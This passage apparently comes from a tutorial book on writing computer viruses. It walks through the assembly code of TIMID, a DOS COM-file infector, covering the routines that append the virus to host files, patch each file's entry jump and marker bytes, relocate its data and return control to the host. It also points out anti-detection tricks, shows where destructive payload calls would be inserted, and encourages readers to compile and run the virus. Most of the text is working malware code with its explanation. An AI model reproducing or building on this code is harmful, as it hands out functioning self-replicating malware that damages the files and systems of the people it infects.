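def file_ok(header: bytes, file_size: int, added_len: int) -> bool:
    """Same verdict as FILE_OK: True corresponds to returning with z set."""
    return fits_in_segment(file_size, added_len) and not already_marked(header)
```

The same `already_marked` test is all that is needed to recognize a marked file from the outside: read five bytes and compare.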

This completes our discussion of the search mechanism for the virus.

The Copy Mechanism

After the virus finds a file to infect, it must carry out the infection process. We have already briefly discussed how that is to be accomplished, but now let’s write the code that will actually do it. We’ll put all of this code into a routine called INFECT.

The code for INFECT is quite straightforward. First the virus opens the file whose name is stored at FNAME in read/write mode, just as it did when searching for a file, and it stores the file handle in a data area called HANDLE. This time, however, we want to go to the end of the file and store the virus there. To do so, we first move the file pointer using DOS function 42H. In calling function 42H, the register bx must be set up with the file handle number, and cx:dx must contain a 32-bit integer telling where to move the file pointer to. There are three different ways this function can be used, as specified by the contents of the al register. If al=0, the file pointer is set relative to the beginning of the file. If al=1, it is moved relative to the current location, and if al=2, cx:dx is used as the offset from the end of the file. Since the first thing the virus must do is place its code at the end of the COM file it is attacking, it sets the file pointer to the end of the file. This is easy. Set cx:dx=0, al=2 and call function 42H:

    xor cx,cx
    mov dx,cx
    mov bx,WORD PTR [HANDLE]
    mov ax,4202H
    int 21H
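For readers more at home in a high-level language, the file pointer behaves much like the position of a Python file object. The sketch below is an analogy only: it uses an in-memory `io.BytesIO` buffer as a stand-in for an open file, and the three `whence` values play the role of al=0, 1 and 2.

```python
import io

f = io.BytesIO(b"0123456789")        # stand-in for an open ten-byte file

first = f.read(5)                    # pointer starts at 0, read advances it
pos_after_read = f.tell()            # now 5

pos_start = f.seek(0, io.SEEK_SET)   # like al=0: offset from the beginning
f.seek(3, io.SEEK_SET)               # park the pointer at byte 3
pos_cur = f.seek(2, io.SEEK_CUR)     # like al=1: offset from the current position
pos_end = f.seek(0, io.SEEK_END)     # like al=2: offset from the end of the file
```

Here `seek` hands back the new position, much as function 42H returns the new file pointer in dx:ax.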

With the file pointer in the right location, the virus can now write itself out to disk at the end of this file. To do so, one simply uses the DOS write function, 40 Hex. To use function 40H one must set ds:dx to the location in memory where the data is stored that is going to be written to disk. In this case that is the start of the virus. Next, set cx to the number of bytes to write and bx to the file handle.

There is one problem here. Since the virus is going to be attaching itself to COM files of all different sizes, the address of the start of the virus code is not at some fixed location in memory. Every file it is attached to will put it somewhere else in memory. So the virus has to be smart enough to figure out where it is. To do this we will employ a trick in the main control routine, and store the offset of the viral code in a memory location named VIR_START. Here we assume that this memory location has already been properly initialized. Then the code to write the virus to the end of the file it is attacking will simply look like this:

    mov cx,OFFSET FINAL - OFFSET VIRUS
    mov bx,WORD PTR [HANDLE]
    mov dx,WORD PTR [VIR_START]
    mov ah,40H
    int 21H

where VIRUS is a label identifying the start of the viral code and FINAL is a label identifying the end of the code. OFFSET FINAL - OFFSET VIRUS is independent of the location of the virus in memory.

Now, with the main body of viral code appended to the end of the COM file under attack, the virus must do some clean-up work. First, it must move the first five bytes of the COM file to a storage area in the viral code. Then it must put a jump instruction plus the code letters ’VI’ at the start of the COM file. Since we have already read the first five bytes of the COM file in the search routine, they are sitting ready and waiting for action at START_IMAGE. We need only write them out to disk in the proper location. Note that there must be two separate areas in the virus to store five bytes of startup code. The active virus must have the data area START_IMAGE to store data from files it wants to infect, but it must also have another area, which we’ll call START_CODE. This contains the first five bytes of the file it is actually attached to. Without START_CODE, the active virus will not be able to transfer control to the host program it is attached to when it is done executing.

Figure 8: START_IMAGE and START_CODE.

To write the first five bytes of the file under attack, the virus must take the five bytes at START_IMAGE, and store them where START_CODE is located on disk. First, the virus sets the file pointer to the location of START_CODE on disk. To find that location, one must take the original file size (stored at FSIZE by the search routine), and add OFFSET START_CODE - OFFSET VIRUS to it, moving the file pointer with respect to the beginning of the file:

    xor cx,cx
    mov dx,WORD PTR [FSIZE]
    add dx,OFFSET START_CODE - OFFSET VIRUS
    mov bx,WORD PTR [HANDLE]
    mov ax,4200H
    int 21H

Next, the virus writes the five bytes at START_IMAGE out to the file:

    mov cx,5
    mov bx,WORD PTR [HANDLE]
    mov dx,OFFSET START_IMAGE
    mov ah,40H
    int 21H

The final step in infecting a file is to set up the first five bytes of the file with a jump to the beginning of the virus code, along with the identification letters “VI”. To do this, first position the file pointer to the beginning of the file:

    xor cx,cx
    mov dx,cx
    mov bx,WORD PTR [HANDLE]
    mov ax,4200H
    int 21H

Next, we must set up a data area in memory with the correct information to write to the beginning of the file. START_IMAGE is a good place to set up these bytes since the data there is no longer needed for anything. The first byte should be a near jump instruction, E9 Hex:

    mov BYTE PTR [START_IMAGE],0E9H

The next two bytes should be a word to tell the CPU how many bytes to jump forward. This word needs to be the original file size of the host program, plus the number of bytes in the virus which are before the start of the executable code (we will put some data there). We must also subtract 3 from this number because the relative jump is always referenced to the current instruction pointer, which will be pointing to 103H when the jump is actually executed. Thus, the two bytes telling the program where to jump are set up by

    mov ax,WORD PTR [FSIZE]
    add ax,OFFSET VIRUS_START - OFFSET VIRUS - 3
    mov WORD PTR [START_IMAGE+1],ax
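The arithmetic behind the displacement word is easy to check by hand. The following Python sketch works through it for a near jump located at offset 100H. The helper names are ours, and the file size (200H) and data prefix length (6 bytes) in the usage note are example values chosen for illustration, not figures taken from the listing.

```python
import struct

COM_LOAD = 0x100   # offset at which DOS loads a COM image
JMP_LEN = 3        # one opcode byte (E9) plus a 16-bit displacement


def near_jmp_disp(target: int, jmp_addr: int = COM_LOAD) -> int:
    """Displacement word for a near jmp at jmp_addr that must land on target."""
    return (target - (jmp_addr + JMP_LEN)) & 0xFFFF


def jmp_target(disp: int, jmp_addr: int = COM_LOAD) -> int:
    """Inverse: where a near jmp at jmp_addr with this displacement lands."""
    return (jmp_addr + JMP_LEN + disp) & 0xFFFF


def encode_near_jmp(disp: int) -> bytes:
    """The three bytes of the instruction, displacement stored low byte first."""
    return struct.pack("<BH", 0xE9, disp)
```

With a 200H byte host and 6 bytes of data ahead of the first instruction, the target offset is 100H + 200H + 6 = 306H, so `near_jmp_disp(0x306)` gives 203H, which is the file size plus 6 minus 3, in agreement with the rule stated above.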

Finally, set up the ID bytes ’VI’ in our five byte data area,

    mov WORD PTR [START_IMAGE+3],4956H  ;'VI'

write the data to the start of the file, using the DOS write function,

    mov cx,5
    mov dx,OFFSET START_IMAGE
    mov bx,WORD PTR [HANDLE]
    mov ah,40H
    int 21H

and then close the file using DOS,

    mov ah,3EH
    mov bx,WORD PTR [HANDLE]
    int 21H

This completes the copy mechanism.

Data Storage for the Virus

One problem we must face in creating this virus is how to locate data. Since all jumps and calls in a COM file are relative, we needn’t do anything fancy to account for the fact that the virus must relocate itself as it copies itself from program to program. The jumps and calls relocate themselves automatically. Handling the data is not as easy. A data reference like

    mov bx,WORD PTR [HANDLE]

refers to an absolute offset in the program segment labeled HANDLE. We cannot just define a word in memory using an assembler directive like

    HANDLE DW 0

and then assemble the virus and run it. If we do that, it will work right the first time. Once it has attached itself to a new program, though, all the memory addresses will have changed, and the virus will be in big trouble. It will either bomb out itself, or cause its host program to bomb.

Figure 9: Absolute data address catastrophe.

There are two ways to avoid catastrophe here. Firstly, one could put all of the data together in one place, and write the program to dynamically determine where the data is and store that value in a register (e.g. si) to access it dynamically, like this:

    mov bx,[si+HANDLE_OFS]

where HANDLE_OFS is the offset of the variable HANDLE from the start of the data area.

Alternatively, we could put all of the data in a fixed location in the code segment, provided we’re sure that neither the virus nor the host will ever occupy that space. The only safe place to do this is at the very end of the segment, where the stack resides. Since the virus takes control of the CPU first when the COM file is executed, it will control the stack also. Thus we can determine exactly what the stack is doing, and stay out of its way. This is the method we choose.

When the virus first gains control, the stack pointer, sp, is normally set to FFFE Hex, where DOS has already placed a word of zeros. If the virus calls a subroutine, the address directly after the call is placed on the stack, in the bytes FFFC Hex and FFFD Hex in the program’s segment, and the stack pointer is decremented by two, to FFFC Hex. When the CPU executes the return instruction in the subroutine, it uses the two bytes stored by the call to determine where to return to, and increments the stack pointer by two. Likewise, executing a push instruction decrements the stack pointer by two and stores the desired register at the location of the stack pointer. The pop instruction reverses this process. The int instruction requires six bytes of stack space (for the flags, cs and ip), and this includes calls to hardware interrupt handlers, which may be accessed at any time in the program without warning, one on top of the other.
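The bookkeeping described above can be modelled in a few lines of Python. This is a sketch under simplifying assumptions: the class name `Stack16` is ours, memory is a dictionary keyed by the address of each stored word, and the starting value of sp is a parameter (FFFEH is used here as an example).

```python
class Stack16:
    """Toy model of a 16-bit stack that grows downward in memory."""

    def __init__(self, sp: int = 0xFFFE) -> None:
        self.sp = sp
        self.mem = {}                      # word address -> stored word

    def push(self, word: int) -> None:
        self.sp = (self.sp - 2) & 0xFFFF   # decrement first...
        self.mem[self.sp] = word & 0xFFFF  # ...then store at the new sp

    def pop(self) -> int:
        word = self.mem[self.sp]           # read the word at sp...
        self.sp = (self.sp + 2) & 0xFFFF   # ...then increment
        return word


stack = Stack16()
stack.push(0x0109)            # a call pushes its return address
sp_inside_call = stack.sp     # two bytes lower than before
return_addr = stack.pop()     # ret pops it again
sp_after_ret = stack.sp       # back where it started
```

A call followed by its matching return therefore leaves sp unchanged, which is why the data area only has to stay clear of the deepest point the stack reaches.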

The data area for the virus can be located just below the memory required for the stack. The exact amount of stack space required is rather difficult to determine, but 80 bytes will be more than sufficient. The data will go right below these 80 bytes, and in this manner its location may be fixed. One must simply take account of the space it takes up when determining the maximum size of a COM file in the FILE_OK routine.

Of course, one cannot put initialized variables on the stack. They must be stored with the program on disk. To store them near the end of the program segment would require the virus to expand the file size of every file to near the 64K limit. Such a drastic change in file sizes would quickly tip the user off that his system has been infected! Instead, initialized variables should be stored with the executable virus code. This strategy will keep the number of bytes which must be added to the host to a minimum. (Thus it is a worthwhile anti-detection measure.) The drawback is that such variables must then be located dynamically by the virus at run time.

Fortunately, we have only one piece of data which must be pre-initialized, the string used by DOS in the search routine to locate COM files, which we called simply “COMFILE”. If you take a look back to the search routine, you’ll notice that we already took the relocatability of this piece of data into account when we retrieved it using the instructions

    mov dx,WORD PTR [VIR_START]
    add dx,OFFSET COMFILE - OFFSET VIRUS

instead of simply

    mov dx,OFFSET COMFILE

The Master Control Routine

Now we have all the tools to write the TIMID virus. All that is necessary is a master control routine to pull everything together. This master routine must:

Dynamically determine the location (offset) of the virus in memory.
Call the search routine to find a new program to infect.
Infect the program located by the search routine, if it found one.
Return control to the host program.

To determine the location of the virus in memory, we use a simple trick. The first instruction in the master control routine will look like this:

VIRUS:
COMFILE DB '*.COM',0
VIRUS_START:
    call GET_START
GET_START:
    sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS

The call pushes the absolute address of GET_START onto the stack at FFFC Hex (since this is the first instruction of the virus, and the first instruction to use the stack). At that location, we overlay the stack with a word variable called VIR_START. We then subtract the difference in offsets between GET_START and the first byte of the virus, labeled VIRUS. This simple programming trick gets the absolute offset of the first byte of the virus in the program segment, and stores it in an easily accessible variable.
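The subtraction is nothing more than 16-bit arithmetic on two numbers: the run-time return address left by the call, and an assemble-time distance that never changes. The Python sketch below works one example. The function name and all of the offsets in it are made up for illustration.

```python
def code_base(return_addr: int, get_start_ofs: int, virus_ofs: int) -> int:
    """Run-time offset of the label VIRUS.

    return_addr   -- the word the call pushed (run-time address of GET_START)
    get_start_ofs -- offset of GET_START as the assembler saw it
    virus_ofs     -- offset of VIRUS as the assembler saw it
    """
    distance = get_start_ofs - virus_ofs      # fixed when the code is assembled
    return (return_addr - distance) & 0xFFFF  # wraps like a 16-bit register


# Assembled with VIRUS at 108H and GET_START at 111H (9 bytes apart);
# at run time the call happened to push 311H.
base = code_base(0x0311, 0x0111, 0x0108)
```

Because only the distance between the two labels enters the calculation, the result is correct wherever the code ends up in the segment.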

Next comes an important anti-detection step: The master control routine moves the Disk Transfer Area (DTA) to the data area for the virus using DOS function 1A Hex,

    mov dx,OFFSET DTA
    mov ah,1AH
    int 21H

This move is necessary because the search routine will modify data in the DTA. When a COM file starts up, the DTA is set to a default value of an offset of 80H in the program segment. The problem is that if the host program requires command line parameters, they are stored for the program at this same location. If the DTA were not changed temporarily while the virus was executing, the search routine would overwrite any command line parameters before the host program had a chance to access them. That would cause any infected COM program which required a command line parameter to bomb. The virus would execute just fine, and host programs that required no parameters would run fine, but the user could spot trouble with some programs. Temporarily moving the DTA eliminates this problem.

With the DTA moved, the main control routine can safely call the search and copy routines:

    call FIND_FILE  ;try to find a file to infect
    jnz EXIT_VIRUS  ;jump if no file was found
    call INFECT  ;else infect the file
EXIT_VIRUS:

Finally, the master control routine must return control to the host program. This involves three steps: Firstly, restore the DTA to its initial value, offset 80H,

    mov dx,80H
    mov ah,1AH
    int 21H

Next, move the first five bytes of the original host program from the data area START_CODE where they are stored to the start of the host program at 100H.

Finally, the virus must transfer control to the host program at 100H. This requires a trick, since one cannot simply say “jmp 100H” because such a jump is relative, so that instruction won’t be jumping to 100H as soon as the virus moves to another file, and that spells disaster. One instruction which does transfer control to an absolute offset is the return from a call. Since we did a call right at the start of the master control routine, and we haven’t executed the corresponding return yet, executing the ret instruction will both transfer control to the host, and it will clear the stack. Of course, the return address must be set to 100H to transfer control to the host, and not somewhere else. That return address is just the word at VIR_START. So, to transfer control to the host, we write

    mov WORD PTR [VIR_START],100H
    ret

Bingo, the host program takes over and runs as if the virus had never been there.

As written, this master control routine is a little dangerous, because it will make the virus completely invisible to the user when he runs a program... so it could get away. It seems wise to tame the beast a bit when we are just starting. So, after the call to INFECT, let’s just put a few extra lines in to display the name of the file which the virus just infected:

    call INFECT
    mov dx,OFFSET FNAME  ;dx points to FNAME
    mov WORD PTR [HANDLE],24H  ;'$' string terminator
    mov ah,9  ;DOS string write fctn
    int 21H
EXIT_VIRUS:

This uses DOS function 9 to print the string at FNAME, which is the name of the file that was infected. Note that if someone wanted to make a malicious monster out of this virus, the destructive code could easily be put here, or after EXIT_VIRUS, depending on the conditions under which destructive activity was desired. For example, our hacker could write a routine called DESTROY, which would wreak all kinds of havoc, and then code it in like this:

    call INFECT
    call DESTROY
EXIT_VIRUS:

if one wanted to do damage only after a successful infection took place, or like this:

    call INFECT
EXIT_VIRUS:
    call DESTROY

if one wanted the damage to always take place, no matter what, or like this:

    call FIND_FILE
    jnz DESTROY
    call INFECT
EXIT_VIRUS:

if one wanted damage to occur only in the event that the virus could not find a file to infect, etc., etc. I say this not to suggest that you write such a routine—please don’t—but just to show you how easy it would be to control destructive behavior in a virus (or any other program, for that matter).

The First Host

To compile and run the virus, it must be attached to a host program. It cannot exist by itself. In writing the assembly language code for this virus, we have to set everything up so the virus thinks it’s already attached to some COM file. All that is needed is a simple program that does nothing but exit to DOS. To return control to DOS, a program executes DOS function 4C Hex. That just stops the program from running, and DOS takes over. When function 4C is executed, a return code is put in al by the program making the call, where al=0 indicates successful completion of the program. Any other value indicates some kind of error, as determined by the program making the DOS call. So, the simplest COM program would look like this:

    mov ax,4C00H
    int 21H

Since the virus will take over the first five bytes of a COM file, and since you probably don’t know how many bytes the above two instructions will take up, let’s put five NOP (no operation) instructions at the start of the host program. These take up five bytes which do nothing. Thus, the host program will look like this:

HOST:
    nop
    nop
    nop
    nop
    nop
    mov ax,4C00H
    int 21H

We don’t want to code it like that though! We code it to look just like it would if the virus had infected it. Namely, the NOP’s will be stored at START_CODE,

START_CODE:
    nop
    nop
    nop
    nop
    nop

and the first five bytes of the host will consist of a jump to the virus and the letters “VI”:

HOST:
    jmp NEAR VIRUS_START
    db 'VI'
    mov ax,4C00H
    int 21H

There, that’s it. The TIMID virus is listed in its entirety in Appendix A, along with everything you need to compile it correctly.

I realize that you might be overwhelmed with new ideas and technical details at this point, and for me to call this virus “simple” might be discouraging. If so, don’t lose heart. Study it carefully. Go back over the text and piece together the various functional elements, one by one. And if you feel confident, you might try putting it in a subdirectory of its own on your machine and giving it a whirl. If you do though, be careful! Proceed at your own risk! It’s not like any other computer program you’ve ever run!
